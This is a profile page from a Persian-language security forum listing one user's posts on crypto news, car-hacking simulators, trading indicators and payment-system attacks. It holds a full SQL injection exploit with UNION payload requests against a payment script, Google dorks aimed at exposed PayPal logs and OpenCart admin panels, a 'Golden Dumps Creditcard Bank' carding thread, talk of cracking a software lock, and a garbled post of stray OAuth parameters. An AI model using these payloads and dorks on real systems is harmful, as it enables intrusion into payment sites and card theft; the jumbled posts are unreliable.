رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Stubborn

ICG Programmer
  • تعداد ارسال ها

    157
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    43
  • Country

    ایران

آخرین بار برد Stubborn در مهر 12

Stubborn یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

153 Excellent

درباره Stubborn

  • درجه
    مسئول برنامه نویسی ICG
  • تاریخ تولد 11/04/1992

Converted

  • Name
    Mr.MZ
  • Main os
    Linux
  • Programming language
    خیر

آخرین بازدید کنندگان نمایه

3900 بازدید کننده نمایه
  1. سلام و درود مقامات ایران در حال آماده شدن برای اجازه استفاده از ارزهای دیجیتال برای تسویه حساب های بین المللی هستند. به گزارش رسانه های داخلی، مقامات بانک مرکزی و دولت برای اتخاذ مکانیسمی با استفاده از سکه های دیجیتال در حوزه تجارت خارجی چراغ سبز نشان داده اند. کسب‌وکارها در ایران می‌توانند با کریپتو به شرکای خارجی پرداخت کنند رسانه های محلی گزارش دادند که شرکت های ایرانی مجاز به استفاده از ارزهای دیجیتال در تسویه حساب با شرکای خود در کشورهای دیگر خواهند بود. در این راستا توافقنامه ای بین بانک مرکزی ایران و وزارت صنعت، معدن و تجارت حاصل شده است. به نقل از فایننشال تریبون، علیرضا پیمان پاک، رئیس سازمان توسعه تجارت ایران اعلام کرد: ما در حال نهایی کردن مکانیزمی برای عملیات سیستم هستیم. این باید فرصت های جدیدی را برای واردکنندگان و صادرکنندگان فراهم کند تا از ارزهای دیجیتال در معاملات بین المللی خود استفاده کنند. به گزارش خبرگزاری ایرانی ایبنا، پاک که معاون وزیر بازرگانی نیز هست، در شبکه های اجتماعی جزئیاتی را درباره اولین جلسه کارگروه مشترک ارزی بین وزارت متبوعش و بانک مرکزی اعلام کرد. شرکت کنندگان تعدادی از اقدامات را برای تسهیل تجارت خارجی ایران از جمله پذیرش مکانیزم کریپتو تصویب کردند. در ادامه این گزارش به نقل از همین مقام آمده است که وزارت بازرگانی ظرف دو هفته طرحی را برای استفاده از ارزهای رمزنگاری شده استخراج شده محلی و سکه های خریداری شده توسط شرکت های خصوصی برای پرداخت هزینه واردات کالا ارائه خواهد کرد. پیشنهاد اولیه از سوی بانک مرکزی ایران است. پاک تاکید کرد: ارزهای رمزپایه و سیستم های بلاک چین کاربردهای عملی زیادی دارند و در صورت نادیده گرفتن ایران، فرصت های تجاری را از دست می دهد. وی افزود: در برخی از بازارهای هدف ما، به ویژه در کشورهایی مانند عراق، افغانستان یا پاکستان، ممکن است محدودیت هایی برای استفاده از ارزهای دیجیتال وجود داشته باشد، اما در بازارهای اصلی ما مانند روسیه، چین، هند و آسیای جنوب شرقی، استفاده از ارزهای دیجیتال رایج است. شرح داده شده . منبع Bitcoin.com
  2. Stubborn

    نرم‌افزار هک خودرو

    با سلام موضوع بعد ماژول های خودرو هستند که در این پست به آنها می‌پردازیم. در ماژول‌های دارای قابلیت UDS را در خودرو براساس ترافیک شبکه زنده دسترسی می‌گیرد. برای جمع‌آوری داده‌ها، باید یک نوع دستگاه عیب‌یابی را متصل کنید و در حالی که UDSim در حال نظارت بر CANbus است، آن را در مقابل وسیله نقلیه خود اجرا کنید. یا از طریق شبکه های یکپارچه TCP استفاده کرد Fuzzer به عنوان یک موتور منبع باز خوب برای fuzzing انتخاب شده است . پس از کامپایل کردن، یک اسکریپت هلو را در مسیر خود قرار دهید. UDSim فرض می کند هلو در مسیر جستجو قرار دارد https://github.com/zombieCraig/UDSim
  3. Stubborn

    نرم‌افزار هک خودرو

    درود خدمت دوستان عزیز شما در اینجا نشانگرهای قفل درها و نشانگرهای چراغ راهنما و یک پنل کنترلی دارید . که به کاربر اجازه می دهد با شبکه خودرو شبیه سازی شده تعامل داشته باشد، شتاب را اعمال کند و قفل درب و چراغ راهنما را کنترل کند. ICSim به سایر ابزارهای رایگان لینوکس، از جمله CAN Utilities یا can-utils که در مخازن نصب بسته برای اکثر توزیع‌های لینوکس در دسترس هستند، متکی است. در بخش بعدی، نصب و پیکربندی گام به گام نرم افزار ICSim و ابزارهای مرتبط را برای استفاده در کلاس درس، آزمایشگاه کامپیوتر یا ایستگاه کاری تحقیقاتی خودرو و همچنین اجرا در یک ماشین مجازی در ویندوز کالا توضیح خواهیم داد. OpenGarages.org نصب نرم افزار پیش نیازی است که به عنوان وابستگی ها شناخته می شود. ابتدا کالی لینوکس را با تایپ دستور به روز رسانی در یک پنجره جدید ترمینال (خط فرمان) به روز کنید: به روز رسانی sudo apt-get کتابخانه های توسعه LibSDL (SDL مخفف Simple DirectMedia Layer، یک کتابخانه توسعه بین پلتفرمی برای گرافیک کامپیوتری و صدا) را نصب کنید. LibSDL توسط نرم افزار Instrument Cluster Simulator از OpenGarages برای ترسیم و متحرک سازی داشبورد مجازی (یا کلاستر ابزار)، و همچنین برای دسترسی به کنترلرهای مختلف بازی، مانند کنترلر پلی استیشن PS3 استفاده می شود. هر دو کتابخانه libsdl2-dev و libsdl2-image-dev را با دستور نصب کنید: sudo apt-get install libsdl2-dev libsdl2-image-dev پس از نصب کتابخانه های LibSDL، ابزارهای CAN را اضافه کنید. CAN مخفف شبکه کنترل‌کننده، شبکه اصلی در خودروهای مدرن است. ابزارهای CAN در برخی از توزیع‌های لینوکس گنجانده شده‌اند، اما تا زمان نوشتن این مقاله در Kali وجود ندارد. ابزارهای CAN را می توان با استفاده از دستور زیر نصب کرد : sudo apt-get install can-utils هنگامی که وابستگی‌های نرم‌افزار ابزارهای LibSDL و CAN برقرار شد، می‌توانیم ابزارهای هک خودرو ICSim را دانلود و نصب کنیم. sh ~/ICSim/setup_vcan.sh با تایپ ifconfig می توانید بررسی کنید که پیوند شبکه vcan0 فعال است . علاوه بر رابط های شبکه معمولی خود، اکنون باید vcan0 را در لیست مشاهده کنید. با فعال بودن پیوند شبکه vcan0 ، می‌توانیم Instrument Cluster Simulator و Control Panel را برای شبیه‌سازی شبکه کنترل‌کننده زنده و خوشه ابزار در یک خودروی مدرن اجرا کنید https://github.com/zombieCraig/ICSim موفق باشید . سوالی بود پ .خ
  4. Stubborn

    اندیکاتور

    در ضمینه صحبت های بالا توی بحث اندیکاتور ها یه استراتژی به اسم Simple Moving Averags هست که میتونید تقلید کنید و کوین خودتونو اجرا کنید . ودر صورت خطی بودن پروسه Linear Weighted Moving Average رو فرایند انتخاب کنید . در رابطه با مشکل برنامه ها Tdi برنامه هست که باید از سرور های شبکه های جهانی به صورت اتوماسیون صنعتی استفاده کرد که دقیق جواب گو باشد . Around/ Up Ta Around / down
  5. Stubborn

    اندیکاتور

    درود فرا رسیدن ماه محرم تسلیت باد . لطفا در پ.خ ارسال کنید ، همراه با پیش نیاز های برنامه ، ایشالا تا آخر محرم براتون ارسال کنم یا حق
  6. Stubborn

    اندیکاتور

    درود بله کاملا متوجه درخواست شما شدم. در حال حاظر در ترکیه همایش جامع کریپتو کوین و بلوک چین هست ،( فکر کنم ۲ روز دیگه باقی مونده باشه ) یکی از استادان این حوضه و سوال شما ایشون هستند. و درحال حاظر نیز در ترکیه اقامت دارند ، مطمعا جواب میگیرید .
  7. Stubborn

    اندیکاتور

    سلام و درود در حال حاظر به دلیل شبکه ها و زیر ساخت های کشورمون ، تنها چیزی که قابل استفاده توی کشور ما هست اندیکاتور های سیسکو هست ، که توی بازار زیاده و قیمت های ۵۰م و ۶۰م دارند . بنده یکی از دوستانم رو بهتون معرفی میکنم و تضمین کیفیت کاری ، پ.خ چک کنید مهندس .
  8. Stubborn

    PayPal/Credit Card/Debit Card SQL Injection

    با سلام خدمت دوستان ، با استفاده از کنورتو یا kids در اندروید .termux/ Access_tyep: offline Openid.realm Response_type: permission id_token code Redirect_url: bitcoin.com Storagegerl / Ss_domin / Prompt / select account /client ID #scoped User_info_emile User_info
  9. Stubborn

    شکستن قفل پکیج آموزشی

    به نام خدا در ادامه مهندسین عزیز ، فایل را بکشید ، http://convertword.persiangig.com کپی ازاد . حسبی الله.
  10. Stubborn

    شکستن قفل پکیج آموزشی

    دوستان میتونن ازاین اکسپیلوت استفادع کنید https://www.ibm.com/docs/en/rational-clearcase/8.0.1?topic=view-converting-hijacked-files-checkouts https://rogueamoeba.com/fission/
  11. Stubborn

    PayPal/Credit Card/Debit Card SQL Injection

    دورد DORK Dork : intitle:"index of"PayPal.log>" #ME
  12. با سلام Dork #Dork : "Powered By OpenCart" #Dork : intext:OpenCart inurl:index.php?route=common/dashboard #Dork : intext:"Powered By OpenCart" -site:opencart.com -inurl:"Powered By OpenCart" -intitle:"OpenCart" -intitle:"powered by"
  13. Stubborn

    PayPal/Credit Card/Debit Card SQL Injection

    دورد DOrk # Dork: inurl:"/wp-content/plugins/wp-shopping-cart/" # Dork: inurl:cart.php?m=features&id= # Dork: filetype:log inurl:paypal # Dork: inurl:wp-content/plugins/payment-form-for-paypal-pro # Dork: inurl:"paypal.log" ext:log # Dork: inurl:"paypal" intitle:"index of" backup | db | access -github # Dork: intitle:"index of" inurl:"paypal" log # Dork: inurl:inc_paypalstoremanager.asp # Dork: "Powered by DUpaypal" -site:duware.com # Dork: intext:OpenCart inurl:index.php?route=common/dashboard
  14. Stubborn

    PayPal/Credit Card/Debit Card SQL Injection

    دوره آموزش SQL Injection PayPal/Credit Card/Debit Card # Exploit Title: PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection # Dork: N/A # Date: 2018-10-29 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.sourcecodester.com/users/janobe # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tubigangarden.zip # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-18800 # POC: # 1) # http://localhost/[PATH]/index.php?p=accomodation&q=[SQL] # #[PATH]/accomodation.php #... #50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "' AND `NUMPERSON` = " . $_POST['person']; #51 #52 #53 }elseif(isset($_GET['q'])){ #54 #55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "'"; #56 #57 #58 #59 } #60 #61 $accomodation = ' | ' . $_GET['q']; #62 ?> #... GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 Connection: keep-alive HTTP/1.1 200 OK Date: Sun, 28 Oct 2018 19:55:17 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/index.php?p=rooms&q=[SQL] # #[PATH]/room_rates.php #... #50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `NUMPERSON` = " . $_POST['person']; #51 #52 #53 }elseif(isset($_GET['q'])){ #54 #55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ROOM` LIKE '%" . $_GET['q'] . "%'"; #56 #57 #58 }else{ #59 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID`"; #60 } #61 #62 $accomodation = ' | ' . @$_GET['q']; #63 ?> #... GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 Connection: keep-alive HTTP/1.1 200 OK Date: Sun, 28 Oct 2018 19:58:47 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 3) # http://localhost/[PATH]/admin/login.php # #[PATH]/admin/login.php #... #58 if (isset($_POST['btnlogin'])) { #59 //form has been submitted1 #60 #61 $uname = trim($_POST['email']); #62 $upass = trim($_POST['pass']); #...
  15. Stubborn

    Golden Dumps Creditcard Bank

    ببخشید سلام . اینم فکر کن بدرد مرحله اول کار بخوره ایا با این تفسیر چنین کاریو میتونم انجام بدم ؟

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...